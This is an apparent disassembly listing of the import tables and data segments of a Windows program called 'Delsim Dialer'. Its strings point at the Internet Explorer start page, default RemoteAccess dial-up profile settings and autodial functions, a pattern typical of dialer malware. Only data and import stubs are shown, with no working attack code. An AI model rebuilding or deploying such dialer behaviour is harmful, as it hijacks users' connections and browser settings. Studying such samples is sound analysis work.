; BOOL __stdcall PostThreadMessageA(DWORD idThread,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn PostThreadMessageA:dword ; CODE XREF: sub_401000+55�p
; DATA XREF: sub_401000+55�r
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
extrn DispatchMessageA:dword ; CODE XREF: sub_4010C0+441�p
; DATA XREF: sub_4010C0+423�r
; BOOL __stdcall DestroyWindow(HWND hWnd)
extrn DestroyWindow:dword ; CODE XREF: sub_405180+4�p
; sub_406D00+33�p
; DATA XREF: ...
; BOOL __stdcall IsDialogMessageA(HWND hDlg,LPMSG lpMsg)
extrn IsDialogMessageA:dword ; CODE XREF: sub_4010C0+437�p
; DATA XREF: sub_4010C0+41D�r
; BOOL __stdcall GetMessageA(LPMSG lpMsg,HWND hWnd,UINT wMsgFilterMin,UINT wMsgFilterMax)
extrn GetMessageA:dword ; CODE XREF: sub_4010C0+417�p
; sub_4010C0+44D�p
; DATA XREF: ...
; BOOL __stdcall ShowWindow(HWND hWnd,int nCmdShow)
extrn ShowWindow:dword ; CODE XREF: sub_4010C0:loc_4014C4�p
; EnumFunc+3F�p ...
; HWND __stdcall GetDesktopWindow()
extrn GetDesktopWindow:dword ; CODE XREF: sub_4010C0+3C8�p
; DATA XREF: sub_4010C0+3C8�r
; LPSTR __stdcall CharNextA(LPCSTR lpsz)
extrn CharNextA:dword ; CODE XREF: sub_401A30+6C�p
; sub_401A30+D9�p ...
; HANDLE __stdcall LoadImageA(HINSTANCE hInst,LPCSTR name,UINT type,int cx,int cy,UINT fuLoad)
extrn LoadImageA:dword ; CODE XREF: sub_405C90+79D�p
; DATA XREF: sub_405C90+79D�r
; LRESULT __stdcall SendMessageA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn SendMessageA:dword ; CODE XREF: sub_405C90+7AF�p
; DATA XREF: sub_405C90+7AF�r
; BOOL __stdcall SetForegroundWindow(HWND hWnd)
extrn SetForegroundWindow:dword ; CODE XREF: EnumFunc+46�p
; DATA XREF: EnumFunc+46�r
; HWND __stdcall SetFocus(HWND hWnd)
extrn SetFocus:dword ; CODE XREF: EnumFunc+4D�p
; sub_405C90+78C�p
; DATA XREF: ...
; WORD __stdcall GetClassWord(HWND hWnd,int nIndex)
extrn GetClassWord:dword ; CODE XREF: sub_405BD0+11�p
; EnumFunc+12�p
; DATA XREF: ...
; LONG __stdcall GetWindowLongA(HWND hWnd,int nIndex)
extrn GetWindowLongA:dword ; CODE XREF: sub_405BD0+22�p
; EnumFunc+21�p
; DATA XREF: ...
; LONG __stdcall SetWindowLongA(HWND hWnd,int nIndex,LONG dwNewLong)
extrn SetWindowLongA:dword ; CODE XREF: DialogFunc+8D�p
; sub_404ED0+9D�p ...
; BOOL __stdcall EnumWindows(WNDENUMPROC lpEnumFunc,LPARAM lParam)
extrn EnumWindows:dword ; CODE XREF: sub_405BD0+3D�p
; DATA XREF: sub_405BD0+3D�r
;
; Imports from WININET.dll
;
extrn InternetCloseHandle:dword ; CODE XREF: sub_406E60+93F�p
; sub_406E60+949�p ...
extrn InternetReadFile:dword ; CODE XREF: sub_406E60+A1�p
; sub_407820+104�p
; DATA XREF: ...
extrn InternetOpenUrlA:dword ; CODE XREF: sub_406E60+7A�p
; sub_407820+DB�p
; DATA XREF: ...
extrn InternetOpenA:dword ; CODE XREF: sub_406E60+5B�p
; sub_407820+5B�p
; DATA XREF: ...
extrn InternetAutodial:dword ; CODE XREF: sub_406E60+35�p
; sub_407820+35�p
; DATA XREF: ...
extrn InternetCheckConnectionA:dword ; CODE XREF: sub_406E60+20�p
; sub_406E60+44�p ...
;
; Imports from ole32.dll
;
; HRESULT __stdcall CoCreateInstance(const IID *const rclsid,LPUNKNOWN pUnkOuter,DWORD dwClsContext,const IID *const riid,LPVOID *ppv)
extrn CoCreateInstance:dword ; CODE XREF: sub_404810+AA�p
; sub_404A70+7D�p ...
; HRESULT __stdcall CoRevokeClassObject(DWORD dwRegister)
extrn CoRevokeClassObject:dword ; CODE XREF: sub_4046D0+2C�p
; DATA XREF: sub_4046D0+1E�r
; HRESULT __stdcall CoRegisterClassObject(const IID *const rclsid,LPUNKNOWN pUnk,DWORD dwClsContext,DWORD flags,LPDWORD lpdwRegister)
extrn CoRegisterClassObject:dword ; CODE XREF: sub_404630+59�p
; DATA XREF: sub_404630+59�r
; LPVOID __stdcall CoTaskMemRealloc(LPVOID pv,SIZE_T cb)
extrn CoTaskMemRealloc:dword ; CODE XREF: sub_401D60+17�p
; sub_401DC0+63�p
; DATA XREF: ...
; LPVOID __stdcall CoTaskMemAlloc(SIZE_T cb)
extrn CoTaskMemAlloc:dword ; CODE XREF: sub_401620+44�p
; sub_401620+49�p ...
; HRESULT __stdcall CoInitialize(LPVOID pvReserved)
extrn CoInitialize:dword ; CODE XREF: sub_4010C0+18�p
; DATA XREF: sub_4010C0+18�r
; void __stdcall CoUninitialize()
extrn CoUninitialize:dword ; CODE XREF: sub_4010C0+485�p
; DATA XREF: sub_4010C0+485�r
; void __stdcall CoTaskMemFree(LPVOID pv)
extrn CoTaskMemFree:dword ; CODE XREF: sub_4015D0+1E�p
; sub_4015D0+23�p ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40D1F4h
align 8
off_40D1F8 dd offset aS_0 ; DATA XREF: sub_402FF0+EC�r
; "S"
off_40D1FC dd offset aD ; DATA XREF: sub_402FF0+D0�r
; "D"
off_40D200 dd offset aB ; DATA XREF: sub_402FF0+D6�r
; "B"
; LPCSTR off_40D204
off_40D204 dd offset aVal ; DATA XREF: sub_402370:loc_4028D7�r
; "Val"
; LPCSTR off_40D208
off_40D208 dd offset aForceremove ; DATA XREF: sub_402370+111�r
; "ForceRemove"
; LPCSTR off_40D20C
off_40D20C dd offset aNoremove ; DATA XREF: sub_402370:loc_4027F0�r
; "NoRemove"
; LPCSTR lpString2
lpString2 dd offset aDelete ; DATA XREF: sub_402370:loc_40246E�r
; "Delete"
dd 0
dd 21400h, 0
dd 0C0h, 46000000h
; IID stru_40D228
stru_40D228 dd 21401h ; Data1 ; DATA XREF: sub_40ACD0+17�o
dw 0 ; Data2
dw 0 ; Data3
db 0C0h, 6 dup(0), 46h ; Data4
dd 21490h, 0
dd 0C0h, 46000000h, 21491h, 0
dd 0C0h, 46000000h, 21492h, 0
dd 0C0h, 46000000h, 21493h, 0
dd 0C0h, 46000000h, 21494h, 0
dd 0C0h, 46000000h, 214A0h, 0
dd 0C0h, 46000000h, 214A1h, 0
dd 0C0h, 46000000h, 214D0h, 0
dd 0C0h, 46000000h, 214D1h, 0
dd 0C0h, 46000000h, 214D2h, 0
dd 0C0h, 46000000h, 214D3h, 0
dd 0C0h, 46000000h, 214E1h, 0
dd 0C0h, 46000000h, 214E2h, 0
dd 0C0h, 46000000h, 214E3h, 0
dd 0C0h, 46000000h, 214E4h, 0
dd 0C0h, 46000000h, 214E5h, 0
dd 0C0h, 46000000h, 214E6h, 0
dd 0C0h, 46000000h, 214E8h, 0
dd 0C0h, 46000000h, 214E9h, 0
dd 0C0h, 46000000h, 214EAh, 0
dd 0C0h, 46000000h, 214EBh, 0
dd 0C0h, 46000000h, 214ECh, 0
dd 0C0h, 46000000h, 214EDh, 0
dd 0C0h, 46000000h
; IID stru_40D3A8
stru_40D3A8 dd 214EEh ; Data1 ; DATA XREF: sub_40ACD0+C�o
dw 0 ; Data2
dw 0 ; Data3
db 0C0h, 6 dup(0), 46h ; Data4
dd 214EFh, 0
dd 0C0h, 46000000h, 214F0h, 0
dd 0C0h, 46000000h, 214F1h, 0
dd 0C0h, 46000000h, 214F2h, 0
dd 0C0h, 46000000h, 214F3h, 0
dd 0C0h, 46000000h, 214F4h, 0
dd 0C0h, 46000000h, 214F5h, 0
dd 0C0h, 46000000h, 214F6h, 0
dd 0C0h, 46000000h, 214F7h, 0
dd 0C0h, 46000000h, 214F8h, 0
dd 0C0h, 46000000h, 214F9h, 0
dd 0C0h, 46000000h, 214FAh, 0
dd 0C0h, 46000000h, 214FBh, 0
dd 0C0h, 46000000h, 214FCh, 0
dd 0C0h, 46000000h, 214FDh, 0
dd 0C0h, 46000000h, 214FEh, 0
dd 0C0h, 46000000h, 21500h, 0
dd 0C0h, 46000000h, 8BCE1FA1h, 101B0921h, 0DD00FFB1h, 48CC0C01h
dd 88E39E80h, 11CF3578h, 869AEh, 62122E2Bh, 0AC60F6A0h
dd 11D00FD9h, 0C000CB99h, 9744D64Fh, 0ADD8BA80h, 11D0002Bh
dd 0C0000F8Fh, 62D0D74Fh, 68284FAAh, 11D06A48h, 0C000788Ch
dd 0B418D94Fh, 0F1DB8392h, 11D07331h, 0A000998Ch, 0E8BF2DC9h
dd 12DD920h, 11D07B26h, 0A000A98Ch, 0E8BF2DC9h, 2A342FC2h
dd 11D07B26h, 0A000A98Ch, 0E8BF2DC9h, 47D2657Ah, 11D07B27h
dd 0A000A98Ch, 0E8BF2DC9h, 7D688A70h, 11D0C613h, 0C0009B99h
dd 0E155D64Fh, 63B51F80h, 11D0C868h, 0C0009C99h, 0E155D64Fh
dd 0C6C4200h, 11D0C589h, 0C0009A99h, 0E155D64Fh, 1AC3D9F0h
dd 11D1175Ch, 6000BE95h, 4FEA9797h, 63B51F81h, 11D0C868h
dd 0C0009C99h, 0E155D64Fh, 7D688A77h, 11D0C613h, 0C0009B99h
dd 0E155D64Fh, 0BCFCE0A0h, 11D0EC17h, 0A000108Dh, 19270FC9h
dd 0EB0FE172h, 11D01A3Ah, 0A000B389h, 0AC900AC9h, 49C3DE7Ch
dd 11D0D329h, 0C00073ABh, 803EC34Fh, 0FBF23B40h, 101BE3F0h
dd 0AA008884h, 0F8563E00h, 0FBF23B80h, 101BE3F0h, 0AA008884h
dd 0F8563E00h, 0CABB0DA0h, 11CFDA57h, 20007499h, 6297D7AFh
dd 3C374A40h, 11CFBAE4h, 0AA007DBFh, 0EE466900h, 0CFBFAE00h
dd 11D017A6h, 0C000CB99h, 9744D64Fh, 4C96BE40h, 11CF915Ch
dd 0AA00D399h, 37E84A00h, 75048700h, 11D0EF1Fh, 60008898h
dd 0F9ACDE97h, 0F490EB00h, 11D11240h, 60008898h, 0F9ACDE97h
dd 56FDF344h, 11D0FD6Dh, 60008A95h, 90A0C997h, 56FDF342h
dd 11D0FD6Dh, 60008A95h, 90A0C997h
dword_40D688 dd 9B4AA441h ; DATA XREF: sub_4010C0+59�o
; sub_4010C0+62�r
dword_40D68C dd 11D59EBFh ; DATA XREF: sub_4010C0+68�r
dword_40D690 dd 5000118Ch ; DATA XREF: sub_4010C0+6D�r
dword_40D694 dd 0F55749DAh ; DATA XREF: sub_4010C0+79�r
off_40D698 dd offset sub_402180 ; DATA XREF: sub_4010C0+3B1�o
; sub_404570+6�o
dd offset sub_4047F0
dd offset nullsub_1
align 8
off_40D6A8 dd offset aHkcr ; DATA XREF: sub_401F10+10�o
; "HKCR"
dword_40D6AC dd 80000000h ; DATA XREF: sub_401F10:loc_401F42�r
dd offset aHkcu ; "HKCU"
dd 80000001h, 40F168h, 80000002h, 40F164h, 80000003h, 40F15Ch
dd 80000004h, 40F154h, 80000006h, 40F14Ch, 80000005h, 40F138h
dd 80000000h, 40F124h, 80000001h, 40F110h, 80000002h, 40F104h
dd 80000003h, 40F0ECh, 80000004h, 40F0DCh, 80000006h, 40F0C8h
dd 80000005h
byte_40D718 db 1 ; DATA XREF: sub_4010C0+3DA�r
; sub_401F10+23�o ...
db 1
byte_40D71A db 1 ; DATA XREF: sub_4010C0+357�r
; sub_4039C0:loc_404144�r
align 10h
dword_40D720 dd 0 ; DATA XREF: sub_405140+7�o
dword_40D724 dd 12Ch ; DATA XREF: sub_405140:loc_405167�r
dd 1, 12Dh, 2, 12Eh, 3, 12Fh, 4, 130h, 5, 131h, 6, 132h
dd 7, 133h, 8, 134h, 9, 135h, 0Ah, 136h, 0Bh, 137h, 0Ch
dd 138h, 0Dh, 139h, 0Eh, 13Ah, 0Fh, 13Bh, 10h, 13Ch, 11h
dd 13Dh, 12h, 13Eh, 13h, 13Fh, 14h, 140h, 15h, 141h, 16h
dd 142h, 17h, 143h, 1000h, 144h, 1001h, 145h, 1002h, 146h
dd 1003h, 147h, 2000h, 149h, 2001h, 14Ah
off_40D810 dd offset aS_0 ; DATA XREF: sub_405140+14�o
; "S"
dd offset aD ; "D"
dd offset aB ; "B"
dd offset aVal ; "Val"
dd offset aForceremove ; "ForceRemove"
dd offset aNoremove ; "NoRemove"
dd offset aDelete ; "Delete"
align 10h
dword_40D830 dd 2 dup(0) ; DATA XREF: sub_404630+3C�o
dd 0C0h, 46000000h
; IID rclsid
rclsid dd 2E005h ; Data1 ; DATA XREF: sub_404810+A5�o
; sub_404A70+78�o
dw 0 ; Data2
dw 0 ; Data3
db 0C0h, 6 dup(0), 46h ; Data4
; IID riid
riid dd 2E012h ; Data1 ; DATA XREF: sub_404810+9C�o
; sub_404A70+70�o
dw 0 ; Data2
dw 0 ; Data3
db 0C0h, 6 dup(0), 46h ; Data4
dword_40D860 dd 10Bh, 0 ; DATA XREF: sub_40ACD0+3B�o
dd 0C0h, 46000000h
; char byte_40D870[]
byte_40D870 db 4 dup(0) ; DATA XREF: sub_40B7C4+57�o
; sub_40BA13+52�o
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: sub_40B7C4+36�o
; sub_40BA13+39�o
align 4
dword_40D878 dd 0FFFFFFFFh, 40B8D4h, 40B8D8h, 0FFFFFFFFh, 40B988h, 40B98Ch
; DATA XREF: sub_40B7C4+5�o
dword_40D890 dd 0FFFFFFFFh, 40BB0Ch, 40BB10h, 0D968h, 2 dup(0) ; DATA XREF: sub_40BA13+5�o
dd 0DE40h, 0D02Ch, 0DA70h, 2 dup(0)
dd 0E04Ah, 0D134h, 0D93Ch, 2 dup(0)
dd 0E102h, 0D000h, 0DA64h, 2 dup(0)
dd 0E132h, 0D128h, 0DB0Ch, 2 dup(0)
dd 0E1D8h, 0D1D0h, 0DA44h, 2 dup(0)
dd 0E1E2h, 0D108h, 0DAF0h, 2 dup(0)
dd 0E26Eh, 0D1B4h, 5 dup(0)
dd 0E056h, 0E078h, 0E088h, 0E096h, 0E0A8h, 0E0B8h, 0E0CAh
dd 0E0DEh, 0E0EEh, 0E068h, 0
dd 0DBBEh, 0DBCAh, 0DBE0h, 0DBECh, 0DBFCh, 0DC0Ah, 0DC1Ch
dd 0DC32h, 0DC40h, 0DC52h, 0DC62h, 0DC72h, 0DC82h, 0DC94h
dd 0DCAAh, 0DCB6h, 0DCC8h, 0DCD6h, 0DCE2h, 0DCEEh, 0DD04h
dd 0DD1Ah, 0DD36h, 0DD44h, 0DBA8h, 0DD6Eh, 0DD7Eh, 0DD8Ah
dd 0DD96h, 0DDAEh, 0DDC6h, 0DDDEh, 0DDF2h, 0DE06h, 0DE18h
dd 0DE26h, 0DE34h, 0E2EEh, 0E2DCh, 0E2CCh, 0E2BCh, 0E2A2h
dd 0E28Eh, 0E27Ah, 0DB94h, 0DB88h, 0DB7Ch, 0DB74h, 0DB64h
dd 0DB54h, 0E300h, 0DB3Eh, 0DB30h, 0DD5Ch, 0
dd 800000A1h, 80000007h, 80000004h, 80000006h, 80000002h
dd 80000115h, 800000A3h, 0
dd 0E122h, 0E110h, 0
dd 0E038h, 0DF7Ch, 0DF70h, 0DF5Ah, 0DF4Ch, 0E02Ch, 0DF1Ch
dd 0DF0Eh, 0DEFEh, 0DFFEh, 0DED6h, 0DEC8h, 0E020h, 0E00Eh
dd 0DF3Eh, 0DE4Eh, 0DE64h, 0DF2Eh, 0DE78h, 0DE8Ch, 0DE9Ah
dd 0DEA8h, 0DEBCh, 0DFF0h, 0DFE0h, 0DFCAh, 0DFBEh, 0DFAEh
dd 0DF9Ch, 0DEECh, 0DF8Eh, 0
dd 0E1F0h, 0E206h, 0E21Ah, 0E22Eh, 0E23Eh, 0E252h, 0
dd 0E1C4h, 0E1AEh, 0E196h, 0E182h, 0E170h, 0E150h, 0E13Eh
dd 0E160h, 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 2CE0065h
aWaitforsingleo db 'WaitForSingleObject',0
aJ db 'J',0
aCreatethread db 'CreateThread',0
align 4
a1 db '1',0
aCreateeventa db 'CreateEventA',0
align 4
db 96h ; –
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 9
db 3, 6Ch, 73h
aTrlenw db 'trlenW',0
align 4
db 8
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
db 4Eh ; N
db 1, 47h, 65h
aTshortpathname db 'tShortPathNameA',0
db 24h ; $
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 2FFh
aLstrcmpia db 'lstrcmpiA',0
dw 0FAh
aGetcurrentthre db 'GetCurrentThreadId',0
align 10h
db 99h ; ™
db 1, 48h, 65h
aApalloc db 'apAlloc',0
db 5Bh ; [
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 9Bh ; ›
db 1, 48h, 65h
aApcreate db 'apCreate',0
align 2
db 'Ê',0
aGetcommandline db 'GetCommandLineA',0
db 0E4h ; ä
db 1, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
db '´',0
aFreelibrary db 'FreeLibrary',0
db 95h ; •
db 2, 53h, 69h
aZeofresource db 'zeofResource',0
align 2
dw 1C7h
aLoadresource db 'LoadResource',0
align 2
aG db '£',0
aFindresourcea db 'FindResourceA',0
dw 11Ah
aGetlasterror db 'GetLastError',0
align 2
dw 1C3h
aLoadlibraryexa db 'LoadLibraryExA',0
align 4
db 0D2h ; Ò
db 2, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 305h
aLstrcpyna db 'lstrcpynA',0
dw 1B9h
aIsdbcsleadbyte db 'IsDBCSLeadByte',0
align 4
aW db 'W',0
aDeletefilea db 'DeleteFileA',0
db '(',0
aCopyfilea db 'CopyFileA',0
dw 2FCh
aLstrcmpa db 'lstrcmpA',0
align 2
dw 268h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 0Dh
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 1AAh
aInitializecrit db 'InitializeCriticalSection',0
dw 19Dh
aHeapdestroy db 'HeapDestroy',0
aU_0 db 'U',0
aDeletecritical db 'DeleteCriticalSection',0
dd 6547013Eh, 6F725074h, 64644163h, 73736572h, 1C20000h
dd 64616F4Ch, 7262694Ch, 41797261h, 3020000h, 7274736Ch
dd 41797063h, 2F90000h, 7274736Ch, 41746163h, 1C10000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aF db 'f',0
aEntercriticals db 'EnterCriticalSection',0
align 2
db '«',0
aFlushinstructi db 'FlushInstructionCache',0
dw 0F7h
aGetcurrentproc db 'GetCurrentProcess',0
dw 126h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 150h
aGetstartupinfo db 'GetStartupInfoA',0
db '}',0
aExitprocess db 'ExitProcess',0
dw 1A2h
aHeaprealloc db 'HeapReAlloc',0
dd 6548019Fh, 72467061h, 6565h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 1E10000h
aPostthreadmess db 'PostThreadMessageA',0
align 4
db '•',0
aDispatchmessag db 'DispatchMessageA',0
align 4
dd 73490188h, 6C616944h, 654D676Fh, 67617373h, 4165h, 6547012Ah
dd 73654D74h, 65676173h, 26A0041h, 776F6853h, 646E6957h
dd 776Fh, 654700FFh, 73654474h, 706F746Bh, 646E6957h, 776Fh
dd 68430025h, 654E7261h, 417478h, 6F4C01ABh, 74536461h
dd 676E6972h, 4F0041h
aCreatedialogpa db 'CreateDialogParamA',0
align 4
dd 65530258h, 6E695774h, 4C776F64h, 41676E6Fh, 1DE0000h
dd 74736F50h, 7373654Dh, 41656761h, 1020000h, 44746547h
dd 7449676Ch, 6D65h, 6F5001E0h, 75517473h, 654D7469h, 67617373h
dd 8E0065h, 74736544h, 57796F72h, 6F646E69h, 1BE0077h
dd 7373654Dh, 42656761h, 41786Fh, 767702AEh, 69727073h
dd 4166746Eh, 20F0000h
aSenddlgitemmes db 'SendDlgItemMessageA',0
dd 737702ACh, 6E697270h, 416674h, 6553022Ch, 676C4474h
dd 6D657449h, 74786554h, 0D00041h, 6D756E45h, 646E6957h
dd 73776Fh, 65470156h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0EF0000h, 43746547h, 7373616Ch, 64726F57h, 22F0000h
dd 46746553h, 7375636Fh, 2300000h
aSetforegroundw db 'SetForegroundWindow',0
dd 65530214h, 654D646Eh, 67617373h, 4165h, 6F4C01A0h, 6D496461h
dd 41656761h, 0B70000h, 62616E45h, 6957656Ch, 776F646Eh
dd 25E0000h, 57746553h, 6F646E69h, 78655477h, 4174h, 65530252h
dd 6D695474h, 7265h, 694B0195h, 69546C6Ch, 72656Dh, 65470104h
dd 676C4474h, 6D657449h, 74786554h, 53550041h, 32335245h
dd 6C6C642Eh, 1640000h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 65520162h, 6C654467h, 4B657465h, 417965h, 65520167h
dd 756E4567h, 79654B6Dh, 417845h, 6552015Bh, 6F6C4367h
dd 654B6573h, 15F0079h, 43676552h, 74616572h, 79654B65h
dd 417845h, 65520172h, 65704F67h, 79654B6Eh, 417845h, 65520186h
dd 74655367h, 756C6156h, 41784565h, 1760000h, 51676552h
dd 79726575h, 6F666E49h, 4179654Bh, 16A0000h, 45676552h
dd 566D756Eh, 65756C61h, 17B0041h, 51676552h, 79726575h
dd 756C6156h, 41784565h, 44410000h, 49504156h, 642E3233h
dd 6C6Ch, 4853003Bh, 6E616843h, 6F4E6567h, 79666974h, 720000h
dd 6C656853h, 6578456Ch, 65747563h, 48530041h, 334C4C45h
dd 6C642E32h, 53006Ch, 6E556F43h, 74696E69h, 696C6169h
dd 657Ah, 6F43002Dh, 74696E49h, 696C6169h, 657Ah, 6F43004Fh
dd 6B736154h, 466D654Dh, 656572h, 6F43004Eh, 6B736154h
dd 416D654Dh, 636F6C6Ch, 500000h, 61546F43h, 654D6B73h
dd 6165526Dh, 636F6C6Ch, 3E0000h
aCoregisterclas db 'CoRegisterClassObject',0
aG_0 db 'G',0
aCorevokeclasso db 'CoRevokeClassObject',0
db 0Dh,0
aCocreateinstan db 'CoCreateInstance',0
align 4
aOle32_dll db 'ole32.dll',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 10h
aV db 'V',0
aInternetcloseh db 'InternetCloseHandle',0
aW_0 db 'w',0
aInternetreadfi db 'InternetReadFile',0
align 2
aQ db 'q',0
aInternetopenur db 'InternetOpenUrlA',0
align 2
aO db 'o',0
aInternetopena db 'InternetOpenA',0
aO_0 db 'O',0
aInternetautodi db 'InternetAutodial',0
align 2
aT db 'T',0
aInternetcheckc db 'InternetCheckConnectionA',0
align 2
aWininet_dll db 'WININET.dll',0
dw 29Eh
aTerminateproce db 'TerminateProcess',0
align 2
db '-',0
aCreatedirector db 'CreateDirectoryA',0
align 2
dw 15Fh
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
dd 434C01BFh, 5370614Dh, 6E697274h, 4167h, 434C01C0h, 5370614Dh
dd 6E697274h, 5767h, 65470153h, 72745374h, 54676E69h, 41657079h
dd 1560000h, 53746547h, 6E697274h, 70795467h, 5765h, 7452022Fh
dd 776E556Ch, 646E69h, 3Dh dup(0)
_rdata ends
; Section 3. (virtual address 0000F000)
; Virtual size : 00000C6C ( 3180.)
; Section size in file : 00000C00 ( 3072.)
; Offset to raw data for section: 0000CA00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40F000h
dd 3 dup(0)
dd offset sub_40B50B
dd 0
dword_40F014 dd 0 ; DATA XREF: sub_40AFB0+65�o
dword_40F018 dd 0 ; DATA XREF: sub_40AFB0:loc_40B010�o
dword_40F01C dd 0 ; DATA XREF: sub_40AFB0+76�o
dword_40F020 dd 4 dup(0) ; DATA XREF: sub_40AFB0:loc_40B021�o
off_40F030 dd offset aClsid ; DATA XREF: sub_402370:loc_4025AA�o
; sub_402370+958�o
; "CLSID"
dd offset aTypelib ; "TYPELIB"
aTypelib db 'TYPELIB',0 ; DATA XREF: sub_402370+254�o
; sub_402370+971�o ...
aClsid db 'CLSID',0 ; DATA XREF: .data:off_40F030�o
align 4
aDelete db 'Delete',0 ; DATA XREF: .rdata:lpString2�o
; .rdata:0040D828�o
align 10h
aNoremove db 'NoRemove',0 ; DATA XREF: .rdata:off_40D20C�o
; .rdata:0040D824�o
align 4
aForceremove db 'ForceRemove',0 ; DATA XREF: .rdata:off_40D208�o
; .rdata:0040D820�o
aVal db 'Val',0 ; DATA XREF: .rdata:off_40D204�o
; .rdata:0040D81C�o
aB: ; DATA XREF: .rdata:off_40D200�o
; .rdata:0040D818�o
unicode 0, <B>,0
aD: ; DATA XREF: .rdata:off_40D1FC�o
; .rdata:0040D814�o
unicode 0, <D>,0
aS_0: ; DATA XREF: .rdata:off_40D1F8�o
; .rdata:off_40D810�o
unicode 0, <S>,0
dword_40F078 dd 0B62F5910h, 11D16528h, 1196h, 0D0D1EF8h ; DATA XREF: sub_4010C0+21�o
; const WCHAR Type
Type: ; DATA XREF: sub_4010C0+23B�o
; sub_4010C0+316�o
unicode 0, <REGISTRY>,0
align 4
; const WCHAR aModule
aModule: ; DATA XREF: sub_4010C0+230�o
; sub_4010C0+30B�o
unicode 0, <Module>,0
align 4
; char aRegserver[]
aRegserver db 'RegServer',0 ; DATA XREF: sub_4010C0+165�o
align 4
; char String2[]
String2 db 'UnregServer',0 ; DATA XREF: sub_4010C0:loc_401219�o
word_40F0C4 dw 2F2Dh ; DATA XREF: sub_4010C0+11E�r
byte_40F0C6 db 0 ; DATA XREF: sub_4010C0+134�r
align 4
aHkey_current_c db 'HKEY_CURRENT_CONFIG',0
aHkey_dyn_data db 'HKEY_DYN_DATA',0
align 4
aHkey_performan db 'HKEY_PERFORMANCE_DATA',0
align 4
aHkey_users db 'HKEY_USERS',0
align 10h
aHkey_local_mac db 'HKEY_LOCAL_MACHINE',0
align 4
aHkey_current_u db 'HKEY_CURRENT_USER',0
align 4
aHkey_classes_r db 'HKEY_CLASSES_ROOT',0
align 4
aHkcc db 'HKCC',0
align 4
aHkdd db 'HKDD',0
align 4
aHkpd db 'HKPD',0
align 4
aHku db 'HKU',0
aHklm db 'HKLM',0
align 10h
aHkcu db 'HKCU',0 ; DATA XREF: .rdata:0040D6B0�o
align 4
aHkcr db 'HKCR',0 ; DATA XREF: .rdata:off_40D6A8�o
align 10h
; char SubKey[]
SubKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\delsim',0
; DATA XREF: sub_4036E0+229�o
; sub_4039C0+7C6�o
align 4
; char aUninstshortcut[]
aUninstshortcut db 'uninstShortcut',0 ; DATA XREF: sub_4036E0+197�o
; sub_4036E0+1B6�o ...
align 4
; char ValueName[]
ValueName db 'uninstExe',0 ; DATA XREF: sub_4036E0+137�o
; sub_4036E0+156�o ...
align 4
; char MultiByteStr[]
MultiByteStr: ; DATA XREF: sub_4036E0:loc_403781�o
; sub_4036E0:loc_40378E�o ...
unicode 0, <\>,0
; char aUninstallstrin[]
aUninstallstrin db 'UninstallString',0 ; DATA XREF: sub_4039C0+876�o
; char aU[]
aU db ' -u',0 ; DATA XREF: sub_4039C0+808�o
; sub_4039C0:loc_4041D5�o ...
; char aDisplayname[]
aDisplayname db 'DisplayName',0 ; DATA XREF: sub_4039C0+800�o
; BYTE Data
Data db 'Delsim Dialer',0 ; DATA XREF: sub_4039C0+7E1�o
; sub_4039C0+7F8�o
align 4
aInternetDialer db 'Internet Dialer',0 ; DATA XREF: sub_4039C0+715�o
; char a_lnk[]
a_lnk db '.lnk',0 ; DATA XREF: sub_4039C0+6CF�o
; sub_4039C0:loc_40409C�o ...
align 4
; char a_exe[]
a_exe db '.exe',0 ; DATA XREF: sub_4039C0+4F2�o
; sub_4039C0:loc_403EBF�o ...
align 4
; char a_[]
a_: ; DATA XREF: sub_4039C0+3DB�o
; sub_4039C0:loc_403DA8�o ...
unicode 0, <.>,0
; char aC[]
aC db 'c:\',0 ; DATA XREF: sub_4039C0:loc_403C9D�o
; sub_4039C0:loc_403CAA�o ...
; char ProcName[]
ProcName db 'UnRegisterTypeLib',0 ; DATA XREF: sub_404A70+159�o
align 4
; char LibFileName[]
LibFileName db 'oleaut32.dll',0 ; DATA XREF: sub_404A70+148�o
align 4
; char a_tlb[]
a_tlb db '.tlb',0 ; DATA XREF: sub_404C30:loc_404D37�o
align 10h
; LPCSTR off_40F260
off_40F260 dd offset aSoftwareMicr_0 ; DATA XREF: sub_4039C0+655�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aDesktop ; "Desktop"
; LPCSTR off_40F268
off_40F268 dd offset aStartMenu ; DATA XREF: sub_4039C0+64F�r
; "Start Menu"
dd offset aSoftwareMicros ; "Software\\Microsoft\\Internet Explorer\\Ma"...
dd offset aStartPage ; "Start Page"
; LPCSTR lpSubKey
lpSubKey dd offset aRemoteaccess ; DATA XREF: sub_407EC0:loc_408108�r
; sub_4081B0+12�r ...
; "RemoteAccess"
; LPCSTR lpValueName
lpValueName dd offset aDefault ; DATA XREF: sub_407EC0+172�r
; sub_407EC0+19C�r ...
; "Default"
; LPCSTR off_40F27C
off_40F27C dd offset aInternetprofil ; DATA XREF: sub_407EC0:loc_40809B�r
; sub_407EC0+200�r ...
; "InternetProfile"
; LPCSTR off_40F280
off_40F280 dd offset aSoftwareMicr_1 ; DATA XREF: sub_4039C0+2AC�r
